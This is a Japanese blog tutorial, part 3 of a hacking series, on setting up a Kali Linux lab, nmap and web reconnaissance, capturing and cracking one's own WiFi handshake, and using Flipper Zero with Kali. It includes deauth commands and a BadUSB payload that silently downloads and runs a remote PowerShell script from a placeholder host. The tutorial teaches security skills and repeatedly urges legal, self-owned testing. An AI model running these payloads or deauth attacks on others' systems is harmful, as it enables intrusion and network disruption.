Kali Linuxの基礎：ハッキングラボを構築する

ハッカーの道：全5回シリーズ

パート1：イントロダクション → パート2：Flipperマスター → パート3：Kaliの基礎 → パート4：エクスプロイト → パート5：完全監査

パート1と2では、カードをクローンし、無線周波数を分析し、ほとんどの「セキュリティ」がただの見せかけであることを理解しました。外側から脆弱性を見てきましたが、今度は内側に入り、攻撃者の視点からそれらを見ます。

Kali Linuxは業界標準のペネトレーションテスト用ディストリビューションです。600以上のセキュリティツールがプリインストールされています。これは圧倒的に感じるかもしれません。ほとんどのチュートリアルは、理解できないコマンドとなぜそれが重要なのかという文脈もなく、いきなり深いところに投げ込みます。

ここでは違うやり方をします。この記事の終わりまでに、動作するラボを持ち、ネットワーク偵察を基礎レベルで理解し、自分のWiFiハンドシェイクをキャプチャできるようになります。各ステップは前のステップの上に構築されます。

ほとんどのチュートリアルは、理解できないコマンドとなぜそれが重要なのかという文脈もなく、いきなり深いところに投げ込みます。ここでは各ステップが前のステップの上に構築されます。

パート1：ラボの構築

プロのペネトレーションテスターはメインマシンでKaliを実行しません。リセット、スナップショット、破棄が可能な隔離された環境を使用し、メインシステムに影響を与えません。あなたも同じようにします。

オプションA：仮想マシン（学習に推奨）

仮想マシンは最も安全な学習環境を提供します。進捗のスナップショットを取り、間違いを犯し、即座にロールバックできます。

必要なもの

ホストマシン： 16GB以上のRAM、50GB以上の空きディスク容量、仮想化サポート付きの最新CPU
仮想化ソフトウェア： VirtualBox（無料）またはVMware Workstation Player（個人使用は無料）
Kali Linux： kali.orgからの公式プリビルトVM

プロジェクト：Kali VMセットアップ

所要時間： 30〜45分

手順：

ハイパーバイザー（VirtualBoxまたはVMware）用のKali VMイメージをダウンロード
ダウンロードしたアーカイブを展開（Windowsでは7-Zipを推奨）
VMをハイパーバイザーにインポート
リソースを設定：最低4GB RAM（8GB推奨）、2つ以上のCPUコア
ネットワークアダプターを「ブリッジ」モードに設定してフルネットワークアクセスを有効化
VMを起動し、デフォルト認証情報でログイン：kali / kali
ターミナルを開いて実行：sudo apt update && sudo apt full-upgrade -y
簡単に復元できるよう「Fresh Install」という名前のスナップショットを作成

成功の確認： ターミナルを開き、whoamiを実行してkaliと表示されること。

オプションB：専用ハードウェア（本格的な練習用）

Kaliに慣れたら、専用ハードウェアはVMのオーバーヘッドを排除し、ワイヤレステストに不可欠なフルハードウェアアクセスを可能にします。

ハードウェアの推奨

予算オプション	中古ThinkPad X230/T430（$100-150）、Intel WiFiをAtheros AR9285に交換
最新オプション	Linux互換WiFiモジュール搭載のFramework Laptop
専用センサー	外付けAlfa AWUS036ACHアダプター付きRaspberry Pi 5 4GB

今のところ、VMで十分です。ワイヤレステスト用のモニターモードが必要になったとき（この記事の後半でカバー）、専用ハードウェアが重要になります。

オプションC：Live USB（永続性なし）

Live USBはインストールなしでKaliを直接実行します。電源を切るとすべてが消えます。異なるハードウェアでのテストに便利ですが、永続パーティションを作成しない限り、セッションごとに作業内容が失われます。

bash# Create bootable USB on Linux/Mac
sudo dd if=kali-linux-*.iso of=/dev/sdX bs=4M status=progress
# Replace sdX with your USB device (check with 'lsblk')
# On Windows: Use Rufus or balenaEtcher

ddはデータを破壊する

ddコマンドは確認なしでディスクに直接書き込みます。デバイス名を三重にチェックしてください。間違ったデバイスに書き込むと、そのドライブが完全に消去されます。

Kali Linux terminal with security tools running — 適切に設定されたKali Linux環境は、すべてのプロフェッショナルなペネトレーションテストの基盤です。

パート2：ターミナルマインドセット

セキュリティツールに触れる前に、ターミナルに慣れる必要があります。これはオプションではありません。KaliにGUIは存在しますが、本当の作業はコマンドラインで行われます。

基本的なナビゲーション

bash# Know where you are
pwd                    # Print working directory

# Move around
cd /home/kali          # Go to home directory
cd ..                  # Go up one level
cd -                   # Go to previous directory

# See what's here
ls                     # List files
ls -la                 # List all files with details
ls -lah                # Human-readable sizes

# Read files
cat filename           # Display entire file
less filename          # Scrollable view (q to quit)
head -n 20 filename    # First 20 lines
tail -f filename       # Follow file in real-time (logs)

権限昇格

多くのセキュリティツールにはroot権限が必要です。Kaliでは、sudoで一時的なroot権限を取得できます。

bashsudo command           # Run single command as root
sudo -i                # Start root shell (be careful)
whoami                 # Check current user
id                     # Show user and group IDs

責任を持ってRootを使う

rootで実行するということはセーフティネットがないということです。rm -rf /のようなタイプミスですべてが破壊されます。最新のKaliはこの特定のコマンドを防止しますが、原則は変わりません：実行する前に何を実行しているのか理解してください。

プロセス管理

bashps aux                 # All running processes
top                    # Real-time process viewer
htop                   # Better process viewer (install if needed)

# Control processes
ctrl+c                 # Stop current process
ctrl+z                 # Suspend process
bg                     # Resume in background
fg                     # Bring to foreground

# Kill processes
kill PID               # Graceful termination
kill -9 PID            # Force kill (last resort)

ネットワークコマンド

baship a                   # Show network interfaces
ip route               # Show routing table
ping -c 4 8.8.8.8     # Test connectivity
curl ifconfig.me       # Your public IP

# DNS lookups
nslookup google.com
dig google.com

プロジェクト：ターミナルオリエンテーション

所要時間： 15分

タスク：

ip aを使ってローカルネットワーク上のIPアドレスを見つける
ip routeを使ってデフォルトゲートウェイを特定する
ゲートウェイにpingして接続性を確認する
/etcのすべてのファイルを更新時間順にリスト：ls -lt /etc | head
/etc/passwdの最初の50行を読む：head -n 50 /etc/passwd

目標： 考えずにナビゲート、ネットワーク状態のチェック、ファイルの読み取りができるようになること。

パート3：Nmapによるネットワーク偵察

Nmap（Network Mapper）は学ぶ中で最も重要なツールです。ホストの発見、サービスの特定、OSの検出、ネットワークトポロジーのマッピングを行います。他のすべてはnmapの出力の上に構築されます。

最初のスキャン

自分のネットワークをスキャンしましょう。まず、ネットワーク範囲を特定します：

bash# Find your local IP and subnet
ip a | grep inet
# Look for something like: inet 192.168.1.100/24
# The /24 means your network is 192.168.1.0-255

bash# Basic discovery scan (your network only)
sudo nmap -sn 192.168.1.0/24

# What this does:
# -sn = ping scan (no port scanning, just host discovery)
# /24 = scan all 256 addresses in this subnet

次のような出力が表示されます：

textNmap scan report for 192.168.1.1
Host is up (0.0025s latency).
MAC Address: AA:BB:CC:DD:EE:FF (Manufacturer Name)

Nmap scan report for 192.168.1.50
Host is up (0.0042s latency).
MAC Address: 11:22:33:44:55:66 (Another Manufacturer)

最初のスキャンで分かること：「自分のネットワーク上にこれらのデバイスが存在する。」次はもっと深い質問をしましょう。

サービス検出

どのホストが存在するか分かったら、次はどんなサービスが実行されているか知りたくなります。

bash# Scan a single target for open ports and services
sudo nmap -sV 192.168.1.1
# -sV = Version detection (probe open ports for service info)

一般的な出力：

textPORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.4p1
80/tcp   open  http     nginx 1.18.0
443/tcp  open  ssl/http nginx 1.18.0

OS検出

bash# Detect OS (requires root)
sudo nmap -O 192.168.1.1

# Combined scan: OS detection + service versions + default scripts
sudo nmap -A 192.168.1.1

ポートの状態を理解する

Nmapはポートをいくつかの状態で報告します：

open - アプリケーションがアクティブに接続を受け付けている。攻撃者が探しているもの。
closed - ポートはアクセス可能だがアプリケーションがリッスンしていない。ホストは稼働しているが何もない。
filtered - ファイアウォールやフィルターがプローブをブロック。openかclosedか判定不可。
unfiltered - ポートはアクセス可能だがnmapがopenかclosedか判定できない。

スキャンタイプとステルス

bash# TCP Connect scan (default, noisy but reliable)
sudo nmap -sT target

# SYN scan (stealthier, default with root)
sudo nmap -sS target

# UDP scan (slow but important - many services use UDP)
sudo nmap -sU target

# Scan all 65535 ports (thorough but slow)
sudo nmap -p- target

# Scan specific ports
sudo nmap -p 22,80,443,8080 target

# Top 1000 common ports (default behavior)
sudo nmap target

Nmap Scripting Engine (NSE)

NSEは脆弱性検出、サービス列挙などの特殊なスクリプトでnmapを拡張します。

bash# Run default safe scripts
sudo nmap -sC target

# Check for vulnerabilities
sudo nmap --script vuln target

# SMB enumeration (Windows shares)
sudo nmap --script smb-enum-shares target

# HTTP enumeration
sudo nmap --script http-enum target

# List available scripts
ls /usr/share/nmap/scripts/ | head -20

プロジェクト：ネットワークをマッピングする

所要時間： 30分

前提条件： ip aからネットワーク範囲を把握していること

すべてのホストを発見：sudo nmap -sn YOUR_NETWORK/24
発見されたホストとそのMACアドレスをリストアップ
ルーター（通常.1）を選んで実行：sudo nmap -sV -sC YOUR_ROUTER
ルーターのすべての開いているポートとサービスを特定
sudo nmap -A YOUR_COMPUTERを実行して自分のマシンが何を公開しているか確認

ドキュメント： 各デバイス、そのIP、MAC、サービスをリストしたテキストファイルを作成。これがネットワークマップです。

自分のネットワークだけをスキャン

許可なくネットワークをスキャンすることはほとんどの法域で違法です。単純なnmapスキャンでさえ不正アクセスとみなされる可能性があります。自分のネットワーク、自分の機器、明示的な書面による許可がある場所だけにとどめてください。

パート4：Web偵察

nmapスキャンでHTTPサービス（ポート80、443、8080）が見つかったでしょう。そこで何が動いているか理解しましょう。

Whatweb：高速サービス識別

bash# Identify web technologies
whatweb http://192.168.1.1

出力例：

texthttp://192.168.1.1 [200 OK] Country[RESERVED][ZZ],
HTTPServer[nginx/1.18.0], IP[192.168.1.1],
Title[Router Admin], nginx[1.18.0]

Nikto：Web脆弱性スキャナー

bash# Scan for common web vulnerabilities
nikto -h http://192.168.1.1

# This checks for:
# - Outdated server software
# - Dangerous files/CGIs
# - Misconfigurations
# - Default credentials

ディレクトリ列挙：何が隠されている？

Webサーバーにはメインページからリンクされていないディレクトリがよくあります：管理パネル、設定ファイル、バックアップファイル。

bash# Gobuster: directory brute-forcing
gobuster dir -u http://192.168.1.1 -w /usr/share/wordlists/dirb/common.txt

よくある発見：

text/admin   (Status: 301)
/backup  (Status: 403)
/config  (Status: 200)
/login   (Status: 200)

ワードリストの場所

Kaliは/usr/share/wordlists/に広範なワードリストを含んでいます。最も一般的なディレクトリ：dirb/、dirbuster/、rockyou.txt（パスワード）、seclists/（包括的なコレクション）。

プロジェクト：ルーターのWebインターフェースを監査する

所要時間： 20分

whatweb http://YOUR_ROUTER_IPを実行してサーバーを特定
nikto -h http://YOUR_ROUTER_IPを実行して脆弱性をチェック
gobuster dir -u http://YOUR_ROUTER_IP -w /usr/share/wordlists/dirb/small.txtを実行
発見されたディレクトリをブラウザで訪問
管理パネル、バージョン番号、興味深い発見をメモ

よくある発見： デフォルト認証情報で公開されたルーター管理ページ。

Server room with network infrastructure — ネットワーク偵察は、ルーターから隠されたサービスまで、ターゲット環境の完全なトポロジーを明らかにします。

パート5：ワイヤレス偵察

ここからが面白くなります。WiFiネットワークは常にブロードキャストしており、適切なツールがあれば、認証ハンドシェイク（デバイスが接続する際に発生する暗号化された交換）をキャプチャできます。

ハードウェア要件

内蔵WiFiはおそらくこれには使えません。モニターモードとパケットインジェクションをサポートするアダプターが必要です。推奨：Alfa AWUS036ACH（約$50）またはAlfa AWUS036ACM（約$45）。これらはKaliですぐに動作します。

モニターモードの理解

通常のWiFiモード（「マネージドモード」）は自分のデバイス宛のパケットのみを受信します。モニターモードは範囲内のすべてのパケット、チャネル上のすべてのデバイスのトラフィックをキャプチャします。

bash# Check your wireless interfaces
iwconfig
# Look for your adapter (often wlan0 or wlan1)

# Kill interfering processes
sudo airmon-ng check kill

# Enable monitor mode
sudo airmon-ng start wlan0
# Your interface is now wlan0mon

ネットワークのスキャン

bash# Start capturing wireless traffic
sudo airodump-ng wlan0mon

# You'll see:
# BSSID  = Router MAC address
# PWR    = Signal strength (higher = closer)
# CH     = Channel
# ENC    = Encryption (WPA2, WPA3, OPN)
# ESSID  = Network name

# Press Ctrl+C to stop

見えているのは範囲内のすべてのWiFiネットワーク、そのセキュリティ設定、そしてしばしば接続されているデバイスです。これはwar driverが近隣をスキャンする際に見ているものです。

ハンドシェイクのキャプチャ

デバイスがWPA2ネットワークに接続する際、four-wayハンドシェイクがあります。このハンドシェイクをキャプチャすれば、オフラインでパスワードのクラックを試みることができます。

bash# Focus on your target network (your own network!)
sudo airodump-ng -c CHANNEL --bssid ROUTER_MAC -w capture wlan0mon
# -c CHANNEL = Target's channel from previous scan
# --bssid = Target router's MAC address
# -w capture = Save to files starting with "capture"

# Now wait for a device to connect...

# Or force a reconnection (on YOUR network only):
# In a new terminal:
sudo aireplay-ng --deauth 5 -a ROUTER_MAC wlan0mon
# This sends 5 deauth packets, disconnecting clients
# They automatically reconnect, generating a handshake

ハンドシェイクをキャプチャすると、airodump-ngが右上隅に[ WPA handshake: XX:XX:XX:XX:XX:XX ]と表示します。

Deauth攻撃は違法

所有していないネットワークにdeauthenticationパケットを送信することは、Computer Fraud and Abuse Act（米国）や他の国の同様の法律の下で連邦犯罪です。自分のネットワークでのみテストしてください。目的は脆弱性を理解することであり、他者を攻撃することではありません。

ハンドシェイクのクラック

キャプチャしたハンドシェイクがあれば、ワードリストを使ってオフラインでパスワードのクラックを試みることができます：

bash# Crack using a wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

# If the password is in the wordlist, you'll see:
# KEY FOUND! [ password123 ]

# For stronger passwords, use hashcat (GPU-accelerated)
# First, convert capture format:
cap2hccapx capture-01.cap capture.hccapx

# Then crack with hashcat:
hashcat -m 22000 capture.hccapx /usr/share/wordlists/rockyou.txt

14M+

実際のデータ漏洩からの本物のパスワードがrockyou.txtに含まれています。これはキャプチャしたWiFiハンドシェイクのクラックに使用されるデフォルトのワードリストです。

パスワード強度の現実チェック

rockyou.txtには実際のデータ漏洩からの1400万以上のパスワードが含まれています。WiFiパスワードが「password123」や「summer2024」やペットの名前なら、数秒でクラックされます。12文字以上のランダムパスワードなら、ブルートフォースに数百万年かかるでしょう。

プロジェクト：WiFiセキュリティをテストする

所要時間： 45分

前提条件： モニターモード対応の外付けWiFiアダプター

モニターモードを有効化：sudo airmon-ng start wlan0
ネットワークをスキャン：sudo airodump-ng wlan0mon
自分のネットワークのチャネルとBSSIDをメモ
自分のチャネルでキャプチャ：sudo airodump-ng -c CHANNEL --bssid YOUR_BSSID -w mywifi wlan0mon
デバイスを自分のWiFiに再接続（または自分のネットワークでdeauthを使用）
ハンドシェイクキャプチャを確認
rockyou.txtでテスト：aircrack-ng -w /usr/share/wordlists/rockyou.txt mywifi-01.cap

結果： パスワードが見つかった場合は、すぐにランダムで長いもの（20文字以上）に変更してください。

パート6：Flipper Zeroの接続

パート2でのすべてのキャプチャを覚えていますか？Kaliのワークフローに統合しましょう。

ファイル転送

bash# Connect Flipper via USB
# It appears as a mass storage device

# Mount if not auto-mounted
sudo mount /dev/sda1 /mnt/flipper

# Your captures are in:
/mnt/flipper/subghz/       # Sub-GHz captures
/mnt/flipper/nfc/          # NFC dumps
/mnt/flipper/infrared/     # IR captures
/mnt/flipper/lfrfid/       # 125kHz RFID
/mnt/flipper/badusb/       # BadUSB scripts

NFCダンプの分析

bash# Install libnfc tools
sudo apt install libnfc-bin mfoc mfcuk

# Flipper saves NFC as .nfc text format
# Convert to binary for analysis:
python3 flipper_nfc_to_mfd.py card.nfc card.mfd

# Analyze MIFARE Classic dump
hexdump -C card.mfd | less

Sub-GHz分析

bash# Flipper's .sub files are text-based
cat garage_door.sub

# Contains:
# - Frequency (315MHz, 433MHz, etc.)
# - Protocol or RAW data
# - Timing information

# For deeper RF analysis, use:
# - Universal Radio Hacker (URH)
# - GNU Radio
# - rtl_433 (with SDR hardware)

BadUSB開発

KaliでBadUSBペイロードを作成し、Flipperでテスト：

bash# Flipper uses DuckyScript-compatible syntax
# Create payload on Kali:
cat > kali_connect.txt << 'EOF'
DELAY 1000
GUI r
DELAY 500
STRING powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8000/shell.ps1')"
ENTER
EOF

# Host the payload from Kali:
python3 -m http.server 8000

# Copy to Flipper's badusb folder
cp kali_connect.txt /mnt/flipper/badusb/

BadUSBペイロードは強力

これらのスクリプトは接続すると自動的に実行されます。悪意のあるペイロードは数秒でバックドアのインストール、認証情報の窃取、データの破壊が可能です。テスト用に自分のマシンでのみ使用してください。他の人が接続する可能性のある場所にFlipperを放置しないでください。

パート7：ドキュメンテーションとワークフロー

プロのペネトレーションテスターは単にツールを実行するだけではありません。すべてを文書化します。良いドキュメンテーションがアマチュアとプロを分けます。

CherryTreeによるノートテイキング

bash# Install CherryTree (hierarchical note-taking)
sudo apt install cherrytree

# Organize notes by:
# - Target/network
# - Reconnaissance
# - Enumeration
# - Vulnerabilities
# - Exploitation attempts
# - Post-exploitation

Nmap出力の保存

bash# Save in all formats
sudo nmap -sV -sC -oA scan_results target

# Creates:
# scan_results.nmap (human-readable)
# scan_results.xml  (parseable)
# scan_results.gnmap (greppable)

セッションログ

bash# Log entire terminal session
script session_$(date +%Y%m%d_%H%M%S).log

# Now every command and output is recorded
# Type 'exit' to stop logging

ハッカーの道

好奇心から実力へ導く全5回シリーズ。

パート1：イントロダクションパート2：Flipperマスターパート3：Kaliの基礎 ✓ パート4：エクスプロイトパート5：完全監査

パート3チェックリスト

☐ ラボセットアップ： Kali VMが稼働中、更新済み、スナップショット保存済み

☐ ターミナル： ナビゲーション、権限、プロセス制御に慣れている

☐ Nmap： ネットワークをマッピング、サービスを特定、ルーターをスキャン済み

☐ Web偵察： ルーターのWebインターフェースをwhatweb/niktoで分析済み

☐ ワイヤレス： モニターモード有効、ネットワークスキャン済み

☐ ハンドシェイク： 自分のWiFiハンドシェイクをキャプチャしてテスト済み

☐ Flipper： ファイル転送済み、ワークフロー理解済み

☐ ドキュメンテーション： ノート整理済み、スキャン保存済み

Google Calendar Outlook

Kali基礎アクションプラン 0/6

VMにKali Linuxをインストールし、初期スナップショットを作成する
ホームネットワークの完全なnmap探索スキャンを実行する
ルーターのすべての開いているポートとサービスを特定する
whatwebとniktoでルーターのWebインターフェースを監査する
自分のWiFiハンドシェイクをキャプチャしてrockyou.txtでテストする
Flipper ZeroのキャプチャをKaliに転送し、少なくとも1つのNFCダンプを分析する

次のステップ

ラボを構築し、偵察フェーズを学びました。ホストの発見、サービスの特定、ワイヤレスハンドシェイクのキャプチャができるようになりました。攻撃者がネットワークを見るとき何を見ているか理解しています。

パート4では、偵察からエクスプロイトに移ります。学ぶ内容：

Metasploit Framework、エクスプロイトのスイスアーミーナイフ
一般的な脆弱性エクスプロイトワークフロー
ポストエクスプロイト技術：初期アクセス後に何が起こるか
権限昇格：一般ユーザーから管理者への昇格
ピボッティング：侵害されたシステムを使って他を攻撃

偵察はドアがどこにあるかを教えてくれます。エクスプロイトはそこを通る方法を教えてくれます。

領域をマッピングしました。次はそこをナビゲートすることを学びます。パート4で観察者からオペレーターへ。

パート4でお会いしましょう。

How was this article?

Series

The Hacker's Path

View Overview →

1 Introduction 2 Flipper Mastery 3 Kali Fundamentals 4 Exploitation 5 The Full Audit

Part 2: Flipper Mastery Part 4: Exploitation